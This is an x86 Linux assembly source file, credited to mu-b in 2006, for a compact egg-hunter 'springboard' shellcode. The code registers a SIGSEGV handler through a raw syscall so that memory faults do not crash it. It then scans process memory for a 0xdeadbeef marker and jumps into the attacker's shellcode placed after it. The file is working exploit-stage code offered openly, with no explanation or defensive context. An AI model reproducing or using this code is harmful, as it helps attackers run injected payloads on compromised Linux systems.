; ; Copyright (c) 2007 by ; ; 50-byte 32-bit search&jump-signal springboard - (x86-lnx) ; by mu-b - Oct 2006 ; %define __start_addr 0x08102030 %define __flag_val 0xdeadbeef global get_eip mov esp, ebp push __start_addr get_eip: ; ecx = EIP jmp short __callback __get_eip_call: pop ecx lea ecx, [byte ecx-(do_signal-get_eip)] jmp short do_signal __callback: call near __get_eip_call do_signal: ; ebx == SIG_SEGV lea esp, [ebp-4] push byte 11 pop ebx ; signal (ebx, ecx); lea eax, [ebx+37] int 80h search: ; search for our shellcode header pop edi lea edx, [edi+1] push edx mov esi, [edi] cmp esi, __flag_val jnz search finish: ; execute our shellcode lea edi, [edi+4] jmp edi